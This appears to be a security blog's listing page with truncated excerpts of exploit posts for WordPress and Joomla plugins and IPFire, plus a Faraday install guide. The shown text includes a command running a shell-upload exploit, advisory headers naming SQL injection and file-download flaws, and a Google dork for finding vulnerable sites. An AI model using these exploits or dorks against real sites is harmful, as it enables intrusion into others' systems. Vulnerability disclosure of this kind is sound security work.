Security

WordPress and Joomla Creative Contact Form Unauthenticated Shell Upload Vulnerability

claudio@backbox3:~$ python wp_j00m_creative_contact_form_shell_upload.py -t http://127.0.0.1/wordpress -f shell.php -c wordpress ___ ___ __ __,-,__ | Y .-----.----.--| .-----.----.-----.-----. | ' '__| |. | | _ | _| _ | _ | _| -__|__ --| | __| |. / \ |_____|__| |_____| __|__| |_____|_____| |_______| |: | _______ |__| __ |_| |::.|:. | | _ .-----.-----.--------| .---.-. `--- ---' |___| | _ | _ | | | _ | |. | |_____|_____|__|__|__|__|___._| |: 1 | |::....

WordPress CP Multi View Event Calendar 1.01 Sql Injection

###################### # Exploit Title : WordPress CP Multi View Event Calendar 1.01 SQL Injection Vulnerability # Exploit Author : Claudio Viviani # Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip # Date : 2014-10-23 # Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap (0.8-1) Linux / Mozilla Firefox Linux / sqlmap 1.0-dev-5b2ded0 ###################### # Description CP Multi View Event Calendar 1.01 suffers from SQL injection vulnerability calid variable is not sanitized....

How to install Faraday Community Edition on BackBox Linux 3

Tested on: Faraday Community Edition BackBox Linux 3.x x86_64 Download Faraday claudio@backbox3:~$ wget https://github.com/infobyte/faraday/archive/master.zip Install requirements claudio@backbox3:~$ sudo pip install psycopg2 Downloading/unpacking psycopg2 Running setup.py egg_info for package psycopg2 Installing collected packages: psycopg2 Running setup.py install for psycopg2 Successfully installed psycopg2 Cleaning up... claudio@backbox3:~$ Modify installation script claudio@backbox3:~$ unzip master.zip claudio@backbox3:~$ cd faraday-master/ claudio@backbox3:~/faraday-master$ ls apis AUTHORS config data deps exporters faraday.py gui install....

IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection exploit

[claudio@localhost ~]$ python ipfire_cgi_shellshock.py ___ _______ _______ __ _______ __ | | _ | _ |__.----.-----. | _ .-----|__| |. |. 1 |. 1___| | _| -__| |. 1___| _ | | |. |. ____|. __) |__|__| |_____| |. |___|___ |__| |: |: | |: | |: 1 |_____| |::.|::.| |::.| |::.. . | `---`---' `---' `-------' _______ __ __ __ _______ __ __ | _ | |--.-----| | | _ | |--....

Joomla Face Gallery 1.0 Multiple Vulnerabilities

###################### # Exploit Title : Joomla Face Gallery 1.0 Multiple Vulnerabilities # Exploit Author : Claudio Viviani # Vendor Homepage : https://www.apptha.com # Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/150 # Dork Google: inurl:option=com_facegallery # Date : 2014-09-17 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox # Info: # Joomla Face Gallery 1.0 suffers from SQL injection and Arbitrary file download vulnerabilities # PoC Exploit: # # http://localhost/index....